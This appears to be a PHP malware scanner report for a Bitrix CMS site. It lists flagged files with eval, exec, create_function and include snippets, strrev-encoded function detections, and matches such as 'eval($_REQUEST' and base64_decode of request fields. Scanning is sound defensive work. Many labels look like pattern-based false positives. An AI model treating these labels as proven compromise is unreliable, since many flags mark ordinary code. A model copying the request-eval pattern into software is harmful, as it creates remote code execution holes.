Size: 17.96 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec(data.URL);
        if (!
res)
        {
            var 
proto data.URL.match(/\.bitrix24\./) ? 'https' 'http';

            
data.URL proto '://' data.URL;
            
res r.exec(data.URL);
        }

        if (
res)
        {
            
data.URL_SERVER res[1]+'://'+res[2];
            
data.URL_PATH res[3];
        }
    }

    if (!
data.AUTH_HASH)
    {
        var 
content '<div class="form-crm-settings"><form name="form_'+popup_id+'"><table cellpadding="0" cellspacing="2" border="0"><tr><td align="right"><?=CUtil::JSEscape(GetMessage('FORM_TAB_CRM_ROW_TITLE'))?>:</...

/var/www/kievflotq/kievflot.ua/bitrix/modules/form/admin/form_field_edit.php

Size: 31.00 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval('function() {FIELD_TYPE_CHANGE(\'' + (rows_count+1) + '\'); jsFormValidatorSettings.UpdateAll();}');
            
arInputs[i].onchange = new Function('FIELD_TYPE_CHANGE(\'' + (rows_count+1) + '\'); jsFormValidatorSettings.UpdateAll();');
        }

        if (
new_name == 'MESSAGE_' + (rows_count+1))
        {
            
arInputs[i].onchange jsFormValidatorSettings.UpdateAll;
        }
    }

    var 
input1 BX.create('INPUT', {
        
props: {
            
type'hidden',
            
name'ANSWER[]',
            
valuerows_count 1
        
}
    }),
        
input2 BX.create('...

/var/www/kievflotq/kievflot.ua/bitrix/modules/highloadblock/lib/highloadblock.php

Size: 17.42 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($eval); } $entity $entity_data_class::getEntity(); $uFields $USER_FIELD_MANAGER->getUserFields('HLBLOCK_'.$hlblock['ID']); foreach ($uFields as $uField) { if ($uField['MULTIPLE'] == 'N') { $params = array( 'required' => $uField['MANDATORY'] == 'Y' ); $field $USER_FIELD_MANAGER->getEntityField($uField$uField['FIELD_NAME'], $params); $entity->addField($field); foreach ($USER_FIELD_MANAGER->getEntityReferences($uField$field) as $reference) { $entity->addField($reference); } } else { ...

/var/www/kievflotq/kievflot.ua/bitrix/modules/perfmon/admin/perfmon_db_server.php

Size: 32.43 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Function strrev eval_strrev Line: 651 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

lave

/var/www/kievflotq/kievflot.ua/bitrix/modules/perfmon/admin/perfmon_row_edit.php

Size: 17.01 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("return ".$tokens[$pos][1].";"); $pos++; } elseif ($tokens[$pos][0] === T_LNUMBER || $tokens[$pos][0] === T_DNUMBER || $tokens[$pos][0] === T_CONSTANT_ENCAPSED_STRING) { $result = eval("return ".$tokens[$pos][1].";"); $pos++; } elseif ($tokens[$pos][0] === T_ARRAY) { $pos++; while (isset($tokens[$pos]) && $tokens[$pos][0] === T_WHITESPACE$pos++; if ($tokens[$pos][0] !== "(") return; else $pos++; $result = array(); while (true) { while (isset($tokens[$pos]) && $tokens[$pos][0] === T_WHITES...

/var/www/kievflotq/kievflot.ua/bitrix/modules/clouds/admin/clouds_file_list.php

Size: 26.59 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:51 Dangers: 1
DescriptionMatch

Sign 11413268 Line: 103 Dangerous

Malware Signature (hash: 11413268)

eval($_REQUEST

/var/www/kievflotq/kievflot.ua/bitrix/modules/mobileapp/install/components/bitrix/mobileapp.menu/templates/.default/template.php

Size: 12.57 kB Created: 2017-05-21 22:21:44 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec("showAuthForm");
                }
            }
    <?endif;
?>

    if(BX.PULL)
    {
        BX.addCustomEvent("onPullExtendWatch", function(data) {
            BX.PULL.extendWatch(data.id);
        });

        BX.addCustomEvent("thisPageWillDie", function(data) {
            BX.PULL.clearWatch(data.page_id);
        });

        BX.addCustomEvent("onPullEvent", function (module_id, command, params)
        {
            if (module_id == 'main' && (command == 'user_authorize' || command == 'user_logout' || command == 'online_list'))
            {
                //app.onCustomEvent('onPullOnline', {...

/var/www/kievflotq/kievflot.ua/bitrix/modules/bitrixcloud/install/examples/bitrixcloud_backup_read_file.php

Size: 3.33 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:51 Dangers: 1
DescriptionMatch

Exploit execution Line: 4 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/license_key.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/bitrixcloud/install/examples/bitrixcloud_backup_list_files.php

Size: 1.04 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:51 Dangers: 1
DescriptionMatch

Exploit execution Line: 4 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/license_key.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/general/blog_user.php

Size: 23.00 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:51 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function("&\$item""\$item=IntVal(\$item);")); $dbUserGroups CBlogUserGroup::GetList( array(), array("ID" => $arGroups"BLOG_ID" => $blogID), falsefalse, array("ID") ); $arGroups = array(); while ($arUserGroup $dbUserGroups->Fetch()) $arGroups[] = IntVal($arUserGroup["ID"]); if ($action == BLOG_ADD$arCurrentGroups CBlogUser::GetUserGroups($ID$blogID""$selectType); foreach($arGroups as $val) { if ($val != && $val != 2) { if ($action == BLOG_CHANGE || $action == BLOG_ADD...

/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/general/blog.php

Size: 62.20 kB Created: 2017-11-21 16:21:46 Modified: 2023-06-30 13:57:51 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function("&\$item""\$item=IntVal(\$item);")); $vals array_unique($vals); $val implode(","$vals); if (count($vals) <= 0$arSqlSearch_tmp[] = "(1 = 2)"; else $arSqlSearch_tmp[] = (($strNegative == "Y") ? " NOT " "")."(".$arFields[$key]["FIELD"]." IN (".$val."))"; } elseif ($arFields[$key]["TYPE"] == "double") { array_walk($valscreate_function("&\$item""\$item=DoubleVal(\$item);")); $vals array_unique($vals); $val implode(","$vals); if (count($vals) <= 0$arSqlSearch_tm...

/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/index.php

Size: 19.61 kB Created: 2017-11-21 16:21:46 Modified: 2023-06-30 13:57:51 Dangers: 1
DescriptionMatch

Exploit execution Line: 402 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/blog/install/events/set_events.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/components/bitrix/blog.post.edit/templates/.default/script.php

Size: 26.06 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:51 Warns: 1
DescriptionMatch

Function eval Line: 140 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(thetag "_open");

    if (
tagOpen == 0)
    {
        if (
doInsert("[" thetag "]""[/" thetag "]"true))
        {
            eval(
thetag "_open = 1");
            
// Change the button status

            
pushstack(bbtagsthetag);
            
cstat();
        }
    }
    else
    {
        
// Find the last occurance of the opened tag
        
lastindex 0;

        for (
bbtags.lengthi++ )
        {
            if ( 
bbtags[i] == thetag )
            {
                
lastindex i;
            }
        }

        
// Close all tags opened up to that tag was opened
        
while (bbtags[lastindex])
        {
            
tagR...

/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/components/bitrix/blog.post.edit/templates/.default/template.php

Size: 21.58 kB Created: 2017-11-21 16:21:47 Modified: 2023-06-30 13:57:51 Dangers: 1
DescriptionMatch

Exploit execution Line: 242 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/neweditor.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/components/bitrix/blog.post.edit/templates/micro/template.php

Size: 5.14 kB Created: 2017-11-21 16:21:46 Modified: 2023-06-30 13:57:51 Dangers: 1
DescriptionMatch

Exploit execution Line: 87 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/lhe.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/components/bitrix/blog.popular_blogs/component.php

Size: 5.77 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:51 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$a, $b''if($a["VIEWS"] == $b["VIEWS"]) { if($a["NUM_COMMENTS"] < $b["NUM_COMMENTS"]) return 1; elseif($a["NUM_COMMENTS"] > $b["NUM_COMMENTS"]) return -1; else return 0;} return ($a["VIEWS"] < $b["VIEWS"])? 1 : -1;')); $i 0; foreach($arBlogs as $blogID => $info) { if($i >= $arParams["BLOG_COUNT"] && IntVal($arParams["BLOG_COUNT"]) > 0) continue; $arBlog CBlog::GetByID($blogID); $arBlog CBlogTools::htmlspecialcharsExArray($arBlog); $arBlog["BlogUser"] = CBlogUser::GetByID(...

/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/components/bitrix/blog/templates/one_blog_with_main_page/bitrix/blog.post.edit/.default/script.php

Size: 22.93 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:51 Warns: 1
DescriptionMatch

Function eval Line: 97 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(thetag "_open");

    if (
tagOpen == 0)
    {
        if (
doInsert("[" thetag "]""[/" thetag "]"true))
        {
            eval(
thetag "_open = 1");
            
// Change the button status

            
pushstack(bbtagsthetag);
            
cstat();
        }
    }
    else
    {
        
// Find the last occurance of the opened tag
        
lastindex 0;

        for (
bbtags.lengthi++ )
        {
            if ( 
bbtags[i] == thetag )
            {
                
lastindex i;
            }
        }

        
// Close all tags opened up to that tag was opened
        
while (bbtags[lastindex])
        {
            
tagR...

/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/components/bitrix/blog/templates/one_blog_with_main_page/bitrix/blog.post.edit/.default/template.php

Size: 23.87 kB Created: 2017-11-21 16:21:46 Modified: 2023-06-30 13:57:51 Dangers: 1
DescriptionMatch

Exploit execution Line: 355 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/script.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/components/bitrix/blog/templates/one_blog_with_main_page/bitrix/blog.post.comment/.default/script.php

Size: 11.35 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:51 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(thetag "_open");

    if (
tagOpen == 0)
    {
        if (
doInsert("[" thetag "]""[/" thetag "]"true))
        {
            eval(
thetag "_open = 1");
            
// Change the button status

            
pushstack(bbtagsthetag);
            
cstat();
        }
    }
    else
    {
        
// Find the last occurance of the opened tag
        
lastindex 0;

        for (
bbtags.lengthi++ )
        {
            if ( 
bbtags[i] == thetag )
            {
                
lastindex i;
            }
        }

        
// Close all tags opened up to that tag was opened
        
while (bbtags[lastindex])
        {
            
tagR...

/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/components/bitrix/blog/templates/one_blog_with_main_page/bitrix/blog.post.comment/.default/template.php

Size: 21.46 kB Created: 2017-11-21 16:21:46 Modified: 2023-06-30 13:57:51 Dangers: 1
DescriptionMatch

Exploit execution Line: 5 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/script.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/components/bitrix/blog/templates/one_blog_old_version/bitrix/blog.post.edit/.default/template.php

Size: 25.44 kB Created: 2017-11-21 16:21:46 Modified: 2023-06-30 13:57:51 Dangers: 1
DescriptionMatch

Exploit execution Line: 355 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/script.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/components/bitrix/blog/templates/one_blog_old_version/bitrix/blog.post.comment/.default/template.php

Size: 21.68 kB Created: 2017-11-21 16:21:46 Modified: 2023-06-30 13:57:51 Dangers: 1
DescriptionMatch

Exploit execution Line: 5 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/script.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/components/bitrix/blog.post.comment/templates/.default/scripts_for_editor.php

Size: 15.83 kB Created: 2017-11-21 16:21:47 Modified: 2023-06-30 13:57:51 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(scripts[s].JS);
                            }
                        }
                        
                        
BX.ajax.processScripts(scriptstrue);
    
//                    commentEr object may be set in template
                        
if(window.commentEr && window.commentEr == "Y")
                        {
                            
BX('err_comment_'+this.id[1]).innerHTML data;
                        }
                        else
                        {
                            if(
BX('edit_id').value 0)
                            {
                                var 
commentId 'blg-comment-'+this.id[1];
                                if(
BX(commentId))
                                {
                                    var 
newComment BX.create('div',{'html':data});    // tmp container for data
    //...

/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/components/bitrix/blog.post.comment/templates/.default/template.php

Size: 33.53 kB Created: 2017-11-21 16:21:46 Modified: 2023-06-30 13:57:51 Dangers: 3
DescriptionMatch

Exploit execution Line: 161 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/neweditor.php")

Exploit execution Line: 23 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/script.php")

Exploit execution Line: 24 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/scripts_for_editor.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/seo/admin/seo_tools.php

Size: 39.90 kB Created: 2017-11-21 16:21:48 Modified: 2023-06-30 13:57:54 Dangers: 4
DescriptionMatch

Exploit execution Line: 103 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

base64_decode($_REQUEST['title_changer_link'])

Exploit execution Line: 106 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

base64_decode($_REQUEST['title_final'])

Exploit execution Line: 113 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

base64_decode($_REQUEST['title_win_changer_link'])

Exploit execution Line: 116 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

base64_decode($_REQUEST['title_win_final'])

/var/www/kievflotq/kievflot.ua/bitrix/modules/photogallery/install/components/bitrix/photogallery.detail.list/templates/slider_big/template.php

Size: 16.32 kB Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function eval Line: 338 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("div.onclick = function(e){jsUtils.PreventDefault(e); jsUtils.Redirect([], '" res[ii].href "');};");
        
res[ii].parentNode.insertBefore(divres[ii]);
        
res[ii].onmouseover = function()
        {
            
this.previousSibling.onshow();
            
this.bxMouseOver 'Y';
        };
        
res[ii].onmouseout = function()
        {
            
this.bxMouseOver 'N';
            var 
__this this;
            
setTimeout(
                function()
                {
                    if (
__this.previousSibling && __this.previousSibling.bxMouseOver != "Y")
                    {
                        
__this.previousSibling...

/var/www/kievflotq/kievflot.ua/bitrix/modules/photogallery/install/components/bitrix/photogallery.detail.list.ex/templates/.default/bitrix/blog.post.comment/photogallery/template.php

Size: 18.87 kB Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:54 Dangers: 2
DescriptionMatch

Exploit execution Line: 144 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/lhe.php")

Exploit execution Line: 30 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/script.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/photogallery/install/components/bitrix/photogallery.detail.list.ex/templates/.default/template.php

Size: 12.64 kB Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Exploit infected_comment Line: 110 Warning

Comments composed by 5 random chars usually used to detect if a file is infected yet

/*width*/

/var/www/kievflotq/kievflot.ua/bitrix/modules/photogallery/install/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php

Size: 9.46 kB Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("var result = " data "; "); }
            if (
result['status'] == 'inprogress')
            {
                
document.getElementById('photogallery_recalc').innerHTML result['text'];
                if (
__this_source.bReady == false)
                {
                    
document.getElementById('ButtonPhotoGalleryRecalcStart').disabled false;
                    
document.getElementById('ButtonPhotoGalleryRecalcContinue').disabled false;
                    
document.getElementById('ButtonPhotoGalleryRecalcStop').disabled true;
                }
                else
                {
                    
document.getElementById(...

/var/www/kievflotq/kievflot.ua/bitrix/modules/photogallery/install/components/bitrix/photogallery/templates/.default/bitrix/blog.post.comment/photogallery/template.php

Size: 30.03 kB Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 13 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/script.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/compression/include.php

Size: 3.30 kB Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:51 Dangers: 1
DescriptionMatch

Exploit execution Line: 42 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/compression/table.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/fileman/classes/general/editor_utils.php

Size: 8.27 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:51 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($code); echo '#BX_RENDERED_COMPONENT#'$s ob_get_contents(); ob_end_clean(); return $s; } function _RenderAllComponents($arParams$bLPA) { global $APPLICATION$USER$s ''$arPHP PHPParser::ParseFile($arParams['source']); $l count($arPHP); if ($l 0) { $new_source ''$end 0$comp_count 0ob_start(); for ($n 0$n<$l$n++) { $src $arPHP[$n][2]; if (SubStr($src05) == "<?"."php"$src SubStr($src5); else $src SubStr($src2); $src SubStr($src0, -2); $co...

/var/www/kievflotq/kievflot.ua/bitrix/modules/fileman/options.php

Size: 65.77 kB Created: 2017-06-21 17:31:50 Modified: 2023-06-30 13:57:51 Dangers: 2
DescriptionMatch

Exploit execution Line: 1032 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/modules/fileman/lang/'.LANGUAGE_ID.'/admin/fileman_js.php')

Exploit execution Line: 1034 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/modules/fileman/lang/en/admin/fileman_js.php')

/var/www/kievflotq/kievflot.ua/bitrix/modules/fileman/fileman.php

Size: 71.53 kB Created: 2017-06-21 17:31:50 Modified: 2023-06-30 13:57:51 Dangers: 1
DescriptionMatch

Exploit execution Line: 248 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/fileman/install/version.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/fileman/admin/fileman_js.php

Size: 1.58 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:51 Dangers: 2
DescriptionMatch

Exploit execution Line: 11 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/modules/fileman/lang/'.LANGUAGE_ID.'/admin/fileman_js.php')

Exploit execution Line: 13 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/modules/fileman/lang/en/admin/fileman_js.php')

/var/www/kievflotq/kievflot.ua/bitrix/modules/fileman/admin/fileman_admin.php

Size: 51.04 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:51 Warns: 1 Dangers: 1
DescriptionMatch

Exploit execution Line: 17 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/admin/fileman_access.php")

Function posix_getpwuid Warning

Potentially dangerous function `posix_getpwuid`

[https://www.php.net/posix_getpwuid]

posix_getpwuid(fileowner($fnameConverted)); $arrFileGroup posix_getgrgid(filegroup($fnameConverted)); $showField .= " ".$arrFileOwner['name']." ".$arrFileGroup['name']; } } else $showField "&nbsp;"; } $row->AddField("PERMS"$showField); } $showField ""; if (in_array("PERMS_B"$arVisibleColumns)) { $showField "&nbsp;"; if(($USER->CanDoOperation('fileman_view_permissions') || $USER->CanDoOperation('fileman_edit_all_settings')) && $USER->CanDoFileOperation('fm_view_permission'$arPath)) ...

/var/www/kievflotq/kievflot.ua/bitrix/modules/b24connector/install/components/bitrix/b24connector.button.list/ajax.php

Size: 3.73 kB Created: 2017-11-21 16:21:54 Modified: 2023-06-30 13:57:51 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { $this->request Context::getCurrent()->getRequest(); $this->action $this->request->get('action'); $this->prepareRequestData(); if($this->check()) { call_user_func_array($this->getActionCall(), array($this->requestData)); } $this->giveResponse(); } } $controller = new B24CButtonListAjaxController(); $controller->exec()

/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/include/actionsdefinitions.php

Size: 14.99 kB Created: 2017-11-21 16:21:51 Modified: 2023-06-30 13:57:54 Dangers: 2
DescriptionMatch

Function strrev eval_strrev Line: 172 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

LAVE

Function strrev eval_strrev Line: 173 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

lave

/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/include/rolesdefinitions.php

Size: 2.22 kB Created: 2017-05-21 22:21:44 Modified: 2023-06-30 13:57:54 Dangers: 2
DescriptionMatch

Function strrev eval_strrev Line: 64 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

lave

Function strrev eval_strrev Line: 68 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

LAVE

/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/lib/serversdata.php

Size: 5.18 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Function strrev exec_strrev Line: 38 Dangerous

Encoded Function `exec`

[https://www.php.net/exec]

cExe

/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/lib/action.php

Size: 6.78 kB Created: 2017-11-21 16:21:51 Modified: 2023-06-30 13:57:54 Warns: 1 Dangers: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function(""$paramCode); if(is_callable($func)) { $res $func(); $retStr str_replace('##CODE_PARAMS:'.$paramId.'##'$res$retStr); } } } foreach ($this->freeParams as $key => $paramValue$retStr str_replace('##'.$key.'##'$paramValue$retStr); return $retStr; } public function start(array $inputParams = array()) { if(!is_array($inputParams)) throw new \Bitrix\Main\ArgumentTypeException("inputParams""array"); if(isset($this->actionParams["MODIFYERS"]) && is_array($this->action...

Function strrev exec_strrev Line: 154 Dangerous

Encoded Function `exec`

[https://www.php.net/exec]

cExe

/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/lib/monitoring.php

Size: 14.76 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:54 Warns: 1 Dangers: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$data'$item["DATA_FUNC"]); if(is_callable($func)) { $result $func($data); } } else { if(isset($data["calcpr"])) { $data["data"] = $data["calcpr"]; } $result = static::extractRrdValue($data); } return $result; } protected static function extractRrdValue($data) { $result false; if(isset($data["data"]) && is_array($data["data"])) { reset($data["data"]); $result current($data["data"]); } return trim($result); } protected static function getAnsibleSetup($hostname) { static $i...

Function strrev exec_strrev Line: 340 Dangerous

Encoded Function `exec`

[https://www.php.net/exec]

cExe

/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/lib/helper.php

Size: 4.89 kB Created: 2017-11-21 16:21:51 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Function strrev exec_strrev Line: 186 Dangerous

Encoded Function `exec`

[https://www.php.net/exec]

cExe

/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/lib/sitesdata.php

Size: 2.32 kB Created: 2017-11-21 16:21:51 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Function strrev exec_strrev Line: 71 Dangerous

Encoded Function `exec`

[https://www.php.net/exec]

cExe

/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/lib/provider.php

Size: 6.41 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Function strrev exec_strrev Line: 24 Dangerous

Encoded Function `exec`

[https://www.php.net/exec]

cExe

/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/lib/actionmodifyer.php

Size: 3.35 kB Created: 2017-11-21 16:21:51 Modified: 2023-06-30 13:57:54 Dangers: 2
DescriptionMatch

Function strrev eval_strrev Line: 14 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

LAVE

Function strrev eval_strrev Line: 22 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

lave

/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/lib/shelladapter.php

